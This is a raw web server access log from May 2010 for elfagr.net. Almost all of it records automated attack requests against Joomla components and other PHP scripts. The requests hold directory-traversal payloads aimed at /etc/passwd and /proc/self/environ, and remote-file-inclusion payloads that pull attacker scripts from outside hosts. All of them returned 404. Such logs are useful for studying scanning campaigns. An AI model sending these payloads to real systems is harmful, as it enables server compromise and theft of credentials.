222.231.60.209 - - [20/May/2010:03:29:21 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:29:32 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:29:33 -0700] "GET /index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:29:34 -0700] "GET /logs/index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.111.173.43 - - [20/May/2010:03:29:35 -0700] "GET /logs/access_100408.log/errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
124.217.229.185 - - [20/May/2010:03:29:54 -0700] "GET /index.php?option=where_framework&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:30:26 -0700] "GET /index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
124.217.229.185 - - [20/May/2010:03:32:17 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:03:32:17 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.18.19.146 - - [20/May/2010:03:32:49 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
67.18.19.146 - - [20/May/2010:03:32:49 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
84.0.125.26 - - [20/May/2010:03:34:11 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.0.125.26 - - [20/May/2010:03:34:11 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.0.125.26 - - [20/May/2010:03:34:12 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.0.125.26 - - [20/May/2010:03:35:17 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.0.125.26 - - [20/May/2010:03:35:17 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.0.125.26 - - [20/May/2010:03:35:26 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:37:59 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:38:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
124.217.229.185 - - [20/May/2010:03:38:15 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
124.217.229.185 - - [20/May/2010:03:38:16 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
124.217.229.185 - - [20/May/2010:03:38:54 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:03:38:56 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:39:25 -0700] "GET /logs/access.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:39:26 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:39:18 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
77.79.246.241 - - [20/May/2010:03:51:39 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
77.79.246.241 - - [20/May/2010:03:51:33 -0700] "GET /index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
77.79.246.241 - - [20/May/2010:03:51:33 -0700] "GET /logs/index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:57:01 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:57:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:57:02 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [20/May/2010:04:09:55 -0700] "GET /sitemap.xml HTTP/1.1" 200 189 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
66.235.124.58 - - [20/May/2010:04:21:02 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.elfagr.net"
66.235.124.58 - - [20/May/2010:04:21:02 -0700] "GET /logs/access_100408.log HTTP/1.1" 200 584739 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:21:24 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:24:12 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.163.148.130 - - [20/May/2010:04:32:18 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.163.148.130 - - [20/May/2010:04:32:36 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.163.148.130 - - [20/May/2010:04:32:45 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.163.148.130 - - [20/May/2010:04:32:45 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
218.48.202.44 - - [20/May/2010:04:35:45 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://marycheh.egenerationtech.com//logs/bacok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
218.48.202.44 - - [20/May/2010:04:35:54 -0700] "GET /logs/access_091126.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://marycheh.egenerationtech.com//logs/bacok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
218.48.202.44 - - [20/May/2010:04:35:54 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://marycheh.egenerationtech.com//logs/bacok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.163.148.130 - - [20/May/2010:04:38:58 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.163.148.130 - - [20/May/2010:04:38:58 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
89.163.148.130 - - [20/May/2010:04:38:49 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:40:20 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:40:20 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:40:29 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:40:24 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:40:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:40:25 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
79.174.72.86 - - [20/May/2010:04:42:25 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
79.174.72.86 - - [20/May/2010:04:42:25 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
79.174.72.86 - - [20/May/2010:04:42:34 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:43:21 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:43:30 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:43:21 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:43:24 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:43:24 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:43:28 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
79.174.72.86 - - [20/May/2010:04:44:05 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:45:49 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:45:49 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:45:40 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:45:51 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:45:51 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:46:00 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
119.122.138.25 - - [20/May/2010:04:46:57 -0700] "GET /logs/access_100408.log HTTP/1.1" 200 584739 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:51:29 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:51:52 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
84.40.30.37 - - [20/May/2010:04:53:32 -0700] "GET /logs/access_091210.log%20%20/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
84.40.30.37 - - [20/May/2010:04:53:32 -0700] "GET /home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
84.40.30.37 - - [20/May/2010:04:53:32 -0700] "GET /logs/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:35 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
84.40.30.37 - - [20/May/2010:04:53:36 -0700] "GET /logs/access_091210.log%20%20/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
84.40.30.37 - - [20/May/2010:04:53:36 -0700] "GET /logs/home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
84.40.30.37 - - [20/May/2010:04:53:36 -0700] "GET /home.php?pagina=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:45 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:36 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:46 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:37 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:37 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
87.252.3.123 - - [20/May/2010:04:53:45 -0700] "GET /logs//uigaproxy/include/template.php?content=http://thecommunities-b2bnetwork.com/articles//1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
87.252.3.123 - - [20/May/2010:04:53:45 -0700] "GET /uigaproxy/include/template.php?content=http://thecommunities-b2bnetwork.com/articles//1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
87.252.3.123 - - [20/May/2010:04:53:54 -0700] "GET /logs/access_100408.log//uigaproxy/include/template.php?content=http://thecommunities-b2bnetwork.com/articles//1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
211.180.203.200 - - [20/May/2010:04:53:57 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:54:36 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:54:28 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:54:28 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:56:29 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:56:29 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:04:56:30 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:05:00:32 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:05:01:24 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:05:01:25 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:05:01:35 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
208.112.114.164 - - [20/May/2010:05:13:14 -0700] "GET /logs/access_100128.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
208.112.114.164 - - [20/May/2010:05:13:14 -0700] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
208.112.114.164 - - [20/May/2010:05:13:14 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
208.112.114.164 - - [20/May/2010:05:13:32 -0700] "GET /logs/access_091217.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
12.204.180.43 - - [20/May/2010:05:23:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
211.180.203.200 - - [20/May/2010:05:26:46 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:05:27:10 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
211.180.203.200 - - [20/May/2010:05:29:01 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
